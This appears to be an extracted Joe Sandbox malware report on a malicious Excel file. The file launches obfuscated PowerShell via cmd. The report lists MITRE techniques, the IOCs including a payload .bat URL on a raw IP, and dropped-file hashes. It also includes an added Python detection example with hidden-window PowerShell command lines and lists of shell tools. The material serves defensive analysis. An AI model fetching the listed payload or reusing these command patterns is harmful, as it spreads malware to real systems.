Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\UEV\Microsoft.Uev.Commands.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-WOW64-Package0013~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\WindowsErrorReporting\Microsoft.WindowsErrorReporting.PowerShell.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Program Files (x86)\AutoIt3\AutoItX\AutoItX3.PowerShell.dll VolumeInformation

Nearly all of these targets are .NET GAC assemblies, PowerShell module DLLs and CatRoot security catalogs, a pattern consistent with assembly loading and Authenticode catalog lookup by the PowerShell host rather than deliberate machine fingerprinting. The query against C:\ is the only one aimed at a volume itself, so this signature is low-fidelity on its own and should be weighed together with the process chain and network activity below.

Mitre Att&ck Matrix

Techniques per tactic as shown in the report's matrix. Entries with trailing digits are the ones the report matched (the digits are its superscript signature markers, kept as extracted); the remaining entries are the unmatched matrix skeleton.

  • Initial Access: Spearphishing Link1, Default Accounts, Domain Accounts, Local Accounts, Cloud Accounts, Replication Through Removable Media, External Remote Services, Drive-by Compromise
  • Execution: Command and Scripting Interpreter1, Scripting211, Exploitation for Client Execution13, At (Windows), Cron, Launchd, Scheduled Task, Command and Scripting Interpreter
  • Persistence: DLL Side-Loading1, Boot or Logon Initialization Scripts, Logon Script (Windows), Logon Script (Mac), Network Logon Script, Rc.common, Startup Items, Scheduled Task/Job
  • Privilege Escalation: Process Injection11, DLL Side-Loading1, Logon Script (Windows), Logon Script (Mac), Network Logon Script, Rc.common, Startup Items, Scheduled Task/Job
  • Defense Evasion: Masquerading1, Disable or Modify Tools1, Virtualization/Sandbox Evasion3, Process Injection11, Deobfuscate/Decode Files or Information1, Scripting211, Obfuscated Files or Information1, DLL Side-Loading1
  • Credential Access: OS Credential Dumping, LSASS Memory, Security Account Manager, NTDS, LSA Secrets, Cached Domain Credentials, DCSync, Proc Filesystem
  • Discovery: Query Registry1, Security Software Discovery11, Virtualization/Sandbox Evasion3, Process Discovery1, Application Window Discovery1, Remote System Discovery1, File and Directory Discovery2, System Information Discovery13
  • Lateral Movement: Remote Services, Remote Desktop Protocol, SMB/Windows Admin Shares, Distributed Component Object Model, SSH, VNC, Windows Remote Management, Shared Webroot
  • Collection: Archive Collected Data1, Data from Removable Media, Data from Network Shared Drive, Input Capture, Keylogging, GUI Input Capture, Web Portal Capture, Credential API Hooking
  • Exfiltration: Exfiltration Over Other Network Medium, Exfiltration Over Bluetooth, Automated Exfiltration, Scheduled Transfer, Data Transfer Size Limits, Exfiltration Over C2 Channel, Exfiltration Over Alternative Protocol, Exfiltration Over Symmetric Encrypted Non-C2 Protocol
  • Command and Control: Encrypted Channel12, Non-Application Layer Protocol1, Application Layer Protocol2, Protocol Impersonation, Fallback Channels, Multiband Communication, Commonly Used Port, Application Layer Protocol
  • Network Effects: Eavesdrop on Insecure Network Communication, Exploit SS7 to Redirect Phone Calls/SMS, Exploit SS7 to Track Device Location, SIM Card Swap, Manipulate Device Communication, Jamming or Denial of Service, Rogue Wi-Fi Access Points, Downgrade to Insecure Protocols
  • Remote Service Effects: Remotely Track Device Without Authorization, Remotely Wipe Data Without Authorization, Obtain Device Cloud Backups
  • Impact: Modify System Partition, Device Lockout, Delete Device Data, Carrier Billing Fraud, Manipulate App Store Rankings or Ratings, Abuse Accessibility Features, Data Encrypted for Impact, Generate Fraudulent Advertising Revenue

Behavior Graph

Behavior Graph ID: 319129. Sample: SIN029088.xls. Start date: 18/11/2020. Architecture: WINDOWS. Score: 80.

Signatures on the sample node: Multi AV Scanner detection for submitted file; Office document tries to convince victim to disable security protection (e.g. to enable ActiveX or Macros); Obfuscated command line found; 4 other signatures.

Process tree recovered from the graph:

  • EXCEL.EXE (dropped C:\Users\user\AppData\...\SIN029088.xls.LNK; signatures: Obfuscated command line found, Document exploit detected (process start blacklist hit))
    • cmd.exe (Obfuscated command line found) started powershell.exe and conhost.exe; this powershell.exe contacted tinyurl.com (104.20.139.65, port 443, local port 49688, CLOUDFLARENETUS, United States)
    • cmd.exe started powershell.exe and conhost.exe; this powershell.exe started attrib.exe
    • cmd.exe started powershell.exe and conhost.exe
    • 2 other processes, which started two further powershell.exe instances and 2 other processes
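The chain the graph records (EXCEL.EXE starting cmd.exe, cmd.exe starting powershell.exe, one powershell.exe reaching tinyurl.com on 443 and another launching attrib.exe) is what a detection should key on. A plain parent/child rule flags the cmd.exe hop but not the powershell.exe that actually makes the connection; walking the full ancestry ties both, and the attrib.exe grandchild, back to Excel. The following is an added example, not code from the Joe Sandbox report: it runs that ancestry check and a URL-shortener check over constructed Sysmon-style events. The event field names, PIDs, command lines, the benign control process under explorer.exe, and the OFFICE_IMAGES, SHELL_IMAGES, LOLBIN_IMAGES and URL_SHORTENERS lists are all assumptions made for the example.

```python
"""Process-chain detection modelled on the behavior graph above:
EXCEL.EXE -> cmd.exe -> powershell.exe -> tinyurl.com:443, plus a sibling
chain whose powershell.exe launches attrib.exe.

Added example, not code from the Joe Sandbox report. The events below are
constructed Sysmon-style records (id 1 = process creation, id 3 = network
connection); PIDs, command lines and the benign control process are
invented to mirror the graph's shape, not copied from the report's logs.
"""

OFFICE_IMAGES = {"excel.exe", "winword.exe", "powerpnt.exe", "outlook.exe"}
SHELL_IMAGES = {"cmd.exe", "powershell.exe", "pwsh.exe", "wscript.exe",
                "cscript.exe", "mshta.exe", "regsvr32.exe", "rundll32.exe"}
# Living-off-the-land binaries worth flagging when they descend from Office.
LOLBIN_IMAGES = {"attrib.exe", "certutil.exe", "bitsadmin.exe"}
# Shortener list is an assumption for this example; feed it from your own intel.
URL_SHORTENERS = {"tinyurl.com", "bit.ly", "t.co", "is.gd", "cutt.ly", "rb.gy"}

PS32 = r"C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"
PS64 = r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"
CMD = r"C:\Windows\System32\cmd.exe"

SAMPLE_EVENTS = [  # constructed sample input
    {"id": 1, "pid": 5652, "ppid": 1000,
     "image": r"C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE",
     "cmd": "EXCEL.EXE /automation -Embedding"},
    {"id": 1, "pid": 6100, "ppid": 5652, "image": CMD,
     "cmd": "cmd /c powershell -w hidden -ep bypass -c <obfuscated>"},
    {"id": 1, "pid": 6120, "ppid": 6100, "image": PS32,
     "cmd": "powershell -w hidden -ep bypass -c <obfuscated>"},
    {"id": 3, "pid": 6120, "image": PS32,
     "dst_host": "tinyurl.com", "dst_ip": "104.20.139.65", "dst_port": 443},
    {"id": 1, "pid": 6200, "ppid": 5652, "image": CMD,
     "cmd": "cmd /c powershell -c <obfuscated>"},
    {"id": 1, "pid": 6220, "ppid": 6200, "image": PS32,
     "cmd": "powershell -c <obfuscated>"},
    {"id": 1, "pid": 6240, "ppid": 6220,
     "image": r"C:\Windows\SysWOW64\attrib.exe", "cmd": "attrib +h pd.bat"},
    # Benign control: an interactive PowerShell under explorer.exe, no Office ancestor.
    {"id": 1, "pid": 7000, "ppid": 900, "image": r"C:\Windows\explorer.exe",
     "cmd": "explorer.exe"},
    {"id": 1, "pid": 7010, "ppid": 7000, "image": PS64, "cmd": "powershell"},
    {"id": 3, "pid": 7010, "image": PS64,
     "dst_host": "www.powershellgallery.com", "dst_ip": "0.0.0.0", "dst_port": 443},
]


def basename(path):
    return path.rsplit("\\", 1)[-1].lower()


def build_tree(events):
    """pid -> creation event, for walking parent links."""
    return {e["pid"]: e for e in events if e["id"] == 1}


def ancestry(procs, pid):
    """Image basenames from the process up to the oldest ancestor on record.
    The seen-set stops a loop if PID reuse ever makes the parent links cyclic."""
    chain, seen = [], set()
    while pid in procs and pid not in seen:
        seen.add(pid)
        chain.append(basename(procs[pid]["image"]))
        pid = procs[pid]["ppid"]
    return chain


def office_descendants(events, watched=None):
    """PIDs of watched binaries that have an Office application anywhere above them.
    Checking the whole ancestry, not just the direct parent, is what catches the
    powershell.exe and attrib.exe behind the cmd.exe hop."""
    watched = watched or (SHELL_IMAGES | LOLBIN_IMAGES)
    procs = build_tree(events)
    hits = []
    for pid in procs:
        chain = ancestry(procs, pid)
        if chain[0] in watched and any(a in OFFICE_IMAGES for a in chain[1:]):
            hits.append(pid)
    return sorted(hits)


def shortener_contacts(events):
    """Connections to a URL shortener made by an Office-descended process."""
    flagged = set(office_descendants(events))
    return [(e["pid"], e["dst_host"], e["dst_port"]) for e in events
            if e["id"] == 3 and e["pid"] in flagged
            and e["dst_host"].lower() in URL_SHORTENERS]


def findings(events):
    """Human-readable chains plus the shortener contacts, keyed for triage."""
    procs = build_tree(events)
    return {
        "office_chains": {pid: " <- ".join(ancestry(procs, pid))
                          for pid in office_descendants(events)},
        "shortener_contacts": shortener_contacts(events),
    }


if __name__ == "__main__":
    for key, value in findings(SAMPLE_EVENTS).items():
        print(key, value)
```

Run against real telemetry, the same two functions take Sysmon EID 1 and EID 3 records (ProcessId/ParentProcessId/Image and DestinationHostname/DestinationPort) after a field rename; the control process under explorer.exe is there to show that an ordinary PowerShell session that also talks to the internet is not flagged.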

Screenshots

Thumbnail images not reproduced.

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Source: detection rate, scanner

  • SIN029088.xls: 8%, Virustotal
  • SIN029088.xls: 2%, ReversingLabs

Dropped Files

No Antivirus matches

Unpacked PE Files

No Antivirus matches

Domains

No Antivirus matches

URLs

URL: detection rate, scanner, label

  • http://pesterbdd.com/images/Pester.png: 0%, URL Reputation, safe
  • http://35.180.137.10/bat/scriptxls_4ebe5706-12b0-4bb2-89a9-a17fc5300f70_snowj1917.bat: 4%, Virustotal
  • http://35.180.137.10/bat/scriptxls_4ebe5706-12b0-4bb2-89a9-a17fc5300f70_snowj1917.bat: 0%, Avira URL Cloud, safe
  • https://go.micro: 0%, URL Reputation, safe
  • https://tinyurl.com4#f: 0%, Avira URL Cloud, safe
  • https://contoso.com/: 0%, Virustotal
  • https://contoso.com/: 0%, Avira URL Cloud, safe
  • https://contoso.com/License: 0%, Virustotal
  • https://contoso.com/License: 0%, Avira URL Cloud, safe
  • https://contoso.com/Icon: 0%, Avira URL Cloud, safe

Domains and IPs

Contacted Domains

Name, IP: active, malicious, antivirus detection, reputation

  • tinyurl.com, 104.20.139.65: active true, malicious false, no antivirus detection, reputation high

URLs from Memory and Binaries

Name | Source | Malicious | Antivirus Detection | Reputation
http://nuget.org/NuGet.exe | powershell.exe, 00000006.00000002.457598759.00000000065B2000.00000004.00000001.sdmp, powershell.exe, 00000009.00000002.468695260.00000000064D3000.00000004.00000001.sdmp, powershell.exe, 0000000C.00000002.445995476.0000000005C95000.00000004.00000001.sdmp | false | | high
https://tinyurl.com | pd.bat.15.dr | false | | high
http://pesterbdd.com/images/Pester.png | powershell.exe, 0000000F.00000002.453245282.0000000005565000.00000004.00000001.sdmp | false | URL Reputation: safe | unknown
http://www.apache.org/licenses/LICENSE-2.0.html | powershell.exe, 0000000F.00000002.453245282.0000000005565000.00000004.00000001.sdmp | false | | high
http://35.180.137.10/bat/scriptxls_4ebe5706-12b0-4bb2-89a9-a17fc5300f70_snowj1917.bat | powershell.exe, 0000000F.00000002.458513367.0000000005988000.00000004.00000001.sdmp | false | 4% Virustotal; Avira URL Cloud: safe | unknown
https://go.micro | powershell.exe, 00000006.00000003.402281824.0000000005F86000.00000004.00000001.sdmp, powershell.exe, 00000009.00000003.412229988.0000000005E9B000.00000004.00000001.sdmp, powershell.exe, 0000000C.00000002.444126941.00000000054C6000.00000004.00000001.sdmp, powershell.exe, 0000000E.00000003.415829479.0000000005B1B000.00000004.00000001.sdmp, powershell.exe, 0000000F.00000002.454341121.000000000562A000.00000004.00000001.sdmp | false | URL Reputation: safe | unknown
https://connect.facebook.net/en_US/fbevents.js | powershell.exe, 0000000F.00000002.458513367.0000000005988000.00000004.00000001.sdmp, pd.bat.15.dr | false | | high
https://tinyurl.com/y252oqq3 | PowerShell_transcript.302494.O2kFUmpi.20201118025653.txt.15.dr | false | | high
https://tinyurl.com4#f | powershell.exe, 0000000F.00000002.458239803.000000000595A000.00000004.00000001.sdmp | false | Avira URL Cloud: safe | unknown
https://contoso.com/ | powershell.exe, 0000000C.00000002.445995476.0000000005C95000.00000004.00000001.sdmp | false | 0% Virustotal; Avira URL Cloud: safe | unknown
https://nuget.org/nuget.exe | powershell.exe, 00000006.00000002.457598759.00000000065B2000.00000004.00000001.sdmp, powershell.exe, 00000009.00000002.468695260.00000000064D3000.00000004.00000001.sdmp, powershell.exe, 0000000C.00000002.445995476.0000000005C95000.00000004.00000001.sdmp | false | | high
http://tinyurl.com | powershell.exe, 0000000F.00000002.458341120.0000000005968000.00000004.00000001.sdmp | false | | high
https://contoso.com/License | powershell.exe, 0000000C.00000002.445995476.0000000005C95000.00000004.00000001.sdmp | false | 0% Virustotal; Avira URL Cloud: safe | unknown
https://contoso.com/Icon | powershell.exe, 0000000C.00000002.445995476.0000000005C95000.00000004.00000001.sdmp | false | Avira URL Cloud: safe | unknown
https://api.pushnami.com/scripts/v1/pushnami-adv/5c018cb890535b0010a5ea87 | powershell.exe, 0000000F.00000002.458557491.000000000599F000.00000004.00000001.sdmp, pd.bat.15.dr | false | | high
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name | powershell.exe, 00000006.00000002.441613141.0000000005551000.00000004.00000001.sdmp, powershell.exe, 00000009.00000002.461718645.0000000005471000.00000004.00000001.sdmp, powershell.exe, 0000000C.00000002.434434476.0000000004C31000.00000004.00000001.sdmp, powershell.exe, 0000000E.00000002.480221111.00000000050F1000.00000004.00000001.sdmp, powershell.exe, 0000000F.00000002.449944220.0000000005421000.00000004.00000001.sdmp | false | | high
https://tinyurl.com/app/nospam/tinyurl.com/y252oqq3/terminated | powershell.exe, 0000000F.00000002.458513367.0000000005988000.00000004.00000001.sdmp | false | | high
https://github.com/Pester/Pester | powershell.exe, 0000000F.00000002.453245282.0000000005565000.00000004.00000001.sdmp | false | | high
https://tinyurl.com/ | powershell.exe, 0000000F.00000002.458341120.0000000005968000.00000004.00000001.sdmp, pd.bat.15.dr | false | | high
https://tinyurl.com/favicon.ico | powershell.exe, 0000000F.00000002.458557491.000000000599F000.00000004.00000001.sdmp, pd.bat.15.dr | false | | high

Contacted IPs


Public

IP | Domain | Country | ASN | ASN Name | Malicious
104.20.139.65 | unknown | United States | 13335 | CLOUDFLARENETUS | false

General Information

Joe Sandbox Version: 31.0.0 Red Diamond
Analysis ID: 319129
Start date: 18.11.2020
Start time: 02:55:46
Joe Sandbox Product: CloudBasic
Overall analysis duration: 0h 10m 3s
Hypervisor based Inspection enabled: false
Report type: full
Sample file name: SIN029088.xls
Cookbook file name: defaultwindowsofficecookbook.jbs
Analysis system description: Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 85, IE 11, Adobe Reader DC 19, Java 8 Update 211
Run name: Potential for more IOCs and behavior
Number of new started processes analysed: 32
Number of new started drivers analysed: 0
Number of existing processes analysed: 0
Number of existing drivers analysed: 0
Number of injected processes analysed: 0
Technologies:
• HCA enabled
• EGA enabled
• HDC enabled
• AMSI enabled
Analysis Mode: default
Analysis stop reason: Timeout
Detection: MAL
Classification: mal80.expl.evad.winXLS@28/31@1/1
EGA Information:
• Successful, ratio: 75%
HDC Information: Failed
HCA Information:
• Successful, ratio: 100%
• Number of executed functions: 260
• Number of non-executed functions: 8
Cookbook Comments:
• Adjust boot time
• Enable AMSI
• Found application associated with file extension: .xls
• Changed system and user locale, location and keyboard layout to French - France
• Found Word or Excel or PowerPoint or XPS Viewer
• Attach to Office via COM
• Scroll down
• Close Viewer
Warnings:
• Exclude process from analysis (whitelisted): taskhostw.exe, MpCmdRun.exe, wermgr.exe, SgrmBroker.exe, conhost.exe, svchost.exe, UsoClient.exe
• Excluded IPs from analysis (whitelisted): 2.20.84.85, 67.27.235.126, 8.248.147.254, 8.248.131.254, 8.248.115.254, 8.241.11.254, 40.88.32.150
• Excluded domains from analysis (whitelisted): skypedataprdcoleus15.cloudapp.net, umwatsonrouting.trafficmanager.net, fs.microsoft.com, audownload.windowsupdate.nsatc.net, e1723.g.akamaiedge.net, ctldl.windowsupdate.com, auto.au.download.windowsupdate.com.c.footprint.net, watson.telemetry.microsoft.com, prod.fs.microsoft.com.akadns.net, fs-wildcard.microsoft.com.edgekey.net, fs-wildcard.microsoft.com.edgekey.net.globalredir.akadns.net, au-bg-shim.trafficmanager.net
• Execution Graph export aborted for target powershell.exe, PID 4824 because it is empty
• Report size exceeded maximum capacity and may have missing behavior information.
• Report size getting too big, too many NtQueryAttributesFile calls found.
• Report size getting too big, too many NtSetInformationFile calls found.

Simulations

Behavior and APIs

Time | Type | Description
02:57:47 | API Interceptor | 375x Sleep call for process: powershell.exe modified

Joe Sandbox View / Context

IPs

Match: 104.20.139.65
Associated Sample Name / URL | Detection
• https://tinyurl.com/y5tjuap2 | malicious
• http://tinyurl.com | malicious
• WayBill Invoice.xls | malicious
• WayBill Invoice.xls | malicious
• rooney-eng-598583_xls.HtMl | malicious
• New PO 9380.xls | malicious
• New PO 9380.xls | malicious
• azklima-584035_xls.HtMl | malicious
• AWB.xls | malicious
• INVOICE N.1.xls | malicious
• PROFORMA INVOICE INV-2.xls | malicious
• Invoice 098734543 3.xls | malicious
• https://naset.ocry.com/#g.rohl@sbo.co.at | malicious
• https://tinyurl.com/y4pw4oey | malicious
• https://linkprotect.cudasvc.com/url?a=https%3a%2f%2fjoom.ag%2f9BjC&c=E,1,FEe77b6JikuybnZvWSPMtboj3kXPvfEd96gDBaPRghPkeeNMaiZ00lHXg2CVBvQXKcXw8950i4VfR2mq9wGKru5dQgG78LY4-xUIpbnM8tgzj5oG4pdo95PFgkNDQw,,&typo=1%3e | malicious
• https://glennbrowitt.com.au/hotel/index.html#scammer@outlook.com | malicious

Domains

Match: tinyurl.com
Associated Sample Name / URL | Detection | Context
• https://tinyurl.com/y5tjuap2 | malicious | 104.20.138.65
• SMBS PO 30 quotation.xls | malicious | 104.20.138.65
• https://tinyurl.com/y5tjuap2 | malicious | 104.20.139.65
• http://tinyurl.com | malicious | 104.20.139.65
• viaseating-666114_xls.HtMl | malicious | 104.20.138.65
• https://tinyurl.com/venmosupp | malicious | 104.20.138.65
• WayBill Invoice.xls | malicious | 172.67.1.225
• WayBill Invoice.xls | malicious | 104.20.139.65
• WayBill Invoice.xls | malicious | 104.20.139.65
• tetratech-907745_xls.HtMl | malicious | 104.20.138.65
• Waybill Invoice.xls | malicious | 104.20.138.65
• Waybill Invoice.xls | malicious | 172.67.1.225
• Waybill Invoice.xls | malicious | 104.20.138.65
• rooney-eng-598583_xls.HtMl | malicious | 104.20.139.65
• Overdue Payments.xls | malicious | 172.67.1.225
• Overdue Payments.xls | malicious | 104.20.138.65
• New PO 9380.xls | malicious | 104.20.139.65
• New PO 9380.xls | malicious | 104.20.139.65
• lorino-106812_xls.HtMl | malicious | 172.67.1.225

ASN

Match: CLOUDFLARENETUS
Associated Sample Name / URL | Detection | Context
• SIN029088.xls | malicious | 104.20.138.65
• Request for Quote_PDF.vbs | malicious | 104.24.127.89
• 01_file.exe | malicious | 104.24.127.89
• TRP SHA58-5310.xlsx | malicious | 172.67.160.188
• 00INVOICE-POLYMERS INC.PO00236-972.xlsx | malicious | 172.67.170.41
• Payment copy.doc | malicious | 162.159.129.233
• anthony.exe | malicious | 23.227.38.64
• aguhvLvn.exe | malicious | 104.23.98.190
• com.amazon.mShop.android.shopping.apk | malicious | 172.64.106.5
• https://bs29579.github.io/cndappip/abt.html?bbre=dsiw4rsd&c=E,1,SxbbXE4aBN7RegSa5xBoOsMB9lXPvUu-vFsUmj7NnZylt4IvMofpzS6coILe4vEfnHDWMz7JUiiOV93EiQiXjjBJoSca9ZjldH7lFvPhpVatNVF9s1hZbQ,,&typo=1 | malicious | 104.16.18.94
• https://fax-dfc26d.webflow.io/ | malicious | 104.16.126.175
• https://www.canva.com/design/DAENxfvgrAs/5Tn-gJFr52_HLDFhOay41A/view?utm_content=DAENxfvgrAs&utm_campaign=designshare&utm_medium=link&utm_source=sharebutton | malicious | 104.18.215.67
• https://tinyurl.com/y5tjuap2 | malicious | 104.20.138.65
• https://www.notion.so/SECURE-SPACE-e22527e1e84948c0a9e448add2846ea8 | malicious | 104.18.23.110
• https://oxy.sendx.io/lp/oryxus.html | malicious | 104.16.18.94
• http://www.flash-rewards.com/PixelEventLogIframe.aspx?FlowID=47581&VID=paVXlaAD1-t3xm47O0s8Sg2&PixelEvtID=16041&fbclid=&gclid=&ckmc=&ckmscn=&ckmsc | malicious | 172.67.178.4
• https://app.box.com/s/8mkzhwsgsowgkcy046cu3h48c41n72ad | malicious | 104.16.18.94
• https://www.notion.so/secure-file-f93a8d7efae24a4fb2178eacaac53379 | malicious | 104.16.19.94
• http://cloudz.pw/go?green=carrier%2048gs-036060301%20operation%20manual | malicious | 104.17.69.176
• http://172.67.185.146 | malicious | 104.16.123.96

JA3 Fingerprints

Match: 54328bd36c14bd82ddaa0c04b25ed9ad
Associated Sample Name / URL | Detection | Context
• Request for Quote_PDF.vbs | malicious | 104.20.139.65
• 01_file.exe | malicious | 104.20.139.65
• aguhvLvn.exe | malicious | 104.20.139.65
• BlueJeans.2.25.11u.msi | malicious | 104.20.139.65
• 2B027105A0C3.exe | malicious | 104.20.139.65
• SecuriteInfo.com.Trojan.GenericKD.35249420.21118.xlsm | malicious | 104.20.139.65
• SecuriteInfo.com.VBA.Heur2.SCrypted.3.D72DA639.Gen.14177.xlsm | malicious | 104.20.139.65
• SecuriteInfo.com.VBA.Heur2.SCrypted.3.D72DA639.Gen.16832.xlsm | malicious | 104.20.139.65
• order2020.PDF.exe | malicious | 104.20.139.65
• SecuriteInfo.com.ArtemisA8D086952534.exe | malicious | 104.20.139.65
• ENJ5AB3B0x.exe | malicious | 104.20.139.65
• web ori2.exe | malicious | 104.20.139.65
• 7fYoHeaCBG.exe | malicious | 104.20.139.65
• DETALLE DE PAGO.exe | malicious | 104.20.139.65
• WayBill Invoice.xls | malicious | 104.20.139.65
• fTAYoI22iY.exe | malicious | 104.20.139.65
• COMSurrogate.exe | malicious | 104.20.139.65
• E1Q0TjeN32.exe | malicious | 104.20.139.65
• hmB9yvFv40.exe | malicious | 104.20.139.65
• ZYhucZndrm.exe | malicious | 104.20.139.65

Dropped Files

No context

Created / dropped Files

C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCache
Process: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type: data
Category: dropped
Size (bytes): 5829
Entropy (8bit): 4.8968676994158
Encrypted: false
SSDEEP: 96:WCJ2WoeRo2k6Lm5emSECNgsRP9iM5Dsx+zsJQIzNEuH+OHgMTyZ69smyFRLcU6/3:5xoeRoVsm5eml+iMDOmEN3H+OHgF69si
MD5: CE11CDA5EB3E7C62CB6DA34341302D93
SHA1: FD13FA29B26C39C3BF4C0398E180589A93EB5BF0
SHA-256: 7C987D134E81F3D7BD095D9CCEEFA1503C079347FD3546C76326CF779850BE97
SHA-512: CCC094DCF6FB27EDEA5D77B1CFBA19C0D05321EEF4DAAC77352FC0BB756407643C4493A0E0B8C10E28DF2144B61BA4F53B4B944273F8BDA097DEB70CB8E54C33
Malicious: false
                                                              Preview: PSMODULECACHE......<.e...Y...C:\Program Files (x86)\WindowsPowerShell\Modules\PowerShellGet\1.0.0.1\PowerShellGet.psd1........Uninstall-Module........inmo........fimo........Install-Module........New-ScriptFileInfo........Publish-Module........Install-Script........Update-Script........Find-Command........Update-ModuleManifest........Find-DscResource........Save-Module........Save-Script........upmo........Uninstall-Script........Get-InstalledScript........Update-Module........Register-PSRepository........Find-Script........Unregister-PSRepository........pumo........Test-ScriptFileInfo........Set-PSRepository........Update-ScriptFileInfo........Get-PSRepository........Get-InstalledModule........Find-Module........Find-RoleCapability........Publish-Script.........<.e...T...C:\Program Files (x86)\WindowsPowerShell\Modules\PowerShellGet\1.0.0.1\PSModule.psm1*.......Install-Script........Save-Module........Publish-Module........Find-Module........Download-Package........Update-Module....
C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
Process: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type: data
Category: dropped
Size (bytes): 17556
Entropy (8bit): 5.56313656879534
Encrypted: false
SSDEEP: 384:NtpLSzIswAF0aVbCLRg4KnbPDulZRIo85QTQ2iwsBMyv1YJzx:6DVz4KzDulnp8OTNyB3S3
MD5: 1E95F63CABDC23B7C1DD2DD7F3B5C8E9
SHA1: 48A04915CAAB1BA33D14EFA46FAEFCB7FFB6E5ED
SHA-256: 5D83E1FDC54FF922B01225CD19F15CB048305D4AE6E6BA2A9FEBA1D54AAE6936
SHA-512: B1993A7A1478FF5D256F108F6EB0F668CC4A1FA23A9ADC024A0D4C5D6F6E62DD8CE44FBF66B0A95E125B3E68A65F48C999AF6727EBD003E8E0CB0653F7D991B3
Malicious: false
                                                              Preview: @...e.......................,...y.......;............@..........H...............<@.^.L."My...:'..... .Microsoft.PowerShell.ConsoleHostD...............fZve...F.....x.)........System.Management.Automation4...............[...{a.C..%6..h.........System.Core.0...............G-.o...A...4B..........System..4................Zg5..:O..g..q..........System.Xml..L...............7.....J@......~.......#.Microsoft.Management.Infrastructure.8................'....L..}............System.Numerics.@................Lo...QN......<Q........System.DirectoryServices<................H..QN.Y.f............System.Management...4....................].D.E.....#.......System.Data.<................):gK..G...$.1.q........System.ConfigurationH................. ....H..m)aUu.........Microsoft.PowerShell.Security...<.................~.[L.D.Z.>..m.........System.Transactions.P................./.C..J..%...].......%.Microsoft.PowerShell.Commands.Utility...D..................-.D.F.<;.nt.1........System.Configuration.Ins
C:\Users\user\AppData\Local\Temp\F4A10000
Process: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE
File Type: data
Category: dropped
Size (bytes): 52924
Entropy (8bit): 7.84591376672679
Encrypted: false
SSDEEP: 768:XM08oobmWXbkLwgwE73DFK5Rhdv1nhQgcJPkrTvG+i:80DobmSb4wjE7zF0Rhdv1hQzMrTvG+i
MD5: F49F6A18EECB85473A532859844E7F07
SHA1: C357BAB9C967347D05E2E18DEFEF8509896AF0D3
SHA-256: BE122157CDD1E6520A117546F0FE502454D15E44AE5B60A0E999240C988121AD
SHA-512: DEF0429EE9FD834097B80719B2AFF09B58F611B18EFB5CBBB2F912DB6ABFC7A9D9F4FEF450770E02D1368A20D84282AA08DC450CAE6531279AA13CC19D68150A
Malicious: false
                                                              Preview: ...N.0.E.H.C.-J.@.5e.e.H.......<ni..q..@}El"...3s3....b...w5.V.V..^i7....Sy..L.)a...m.....b.....E;.Y.R...e.V`..8:..hE..8.A......n....Ke..l<z..X.TL...d..+...eT.D.FK.(Q.r.........\Z..0D....dM..&b|...0d|/3.....9.?"..~iv>T.....xEf. ..>tq/...VP.....%....O..S...q.l.....L.:VY!..815@gB........P..i..>....r....hg.~...v...#Q..o...{<.V........k.j..'.*..|ux......1..............@B....m...;"M....y.)P{..../.......PK..........!.R...............[Content_Types].xml ...(.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................MO.0...H.....
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_2akchdup.3gl.ps1
Process: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type: very short file (no magic)
Category: dropped
Size (bytes): 1
Entropy (8bit): 0.0
Encrypted: false
SSDEEP: 3:U:U
MD5: C4CA4238A0B923820DCC509A6F75849B
SHA1: 356A192B7913B04C54574D18C28D46E6395428AB
SHA-256: 6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
SHA-512: 4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
Malicious: false
Preview: 1
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_2n1n20xl.n02.psm1
Process: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type: very short file (no magic)
Category: dropped
Size (bytes): 1
Entropy (8bit): 0.0
Encrypted: false
SSDEEP: 3:U:U
MD5: C4CA4238A0B923820DCC509A6F75849B
SHA1: 356A192B7913B04C54574D18C28D46E6395428AB
SHA-256: 6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
SHA-512: 4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
Malicious: false
Preview: 1
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_4khsavhq.hlq.psm1
Process: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type: very short file (no magic)
Category: dropped
Size (bytes): 1
Entropy (8bit): 0.0
Encrypted: false
SSDEEP: 3:U:U
                                                              MD5:C4CA4238A0B923820DCC509A6F75849B
                                                              SHA1:356A192B7913B04C54574D18C28D46E6395428AB
                                                              SHA-256:6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
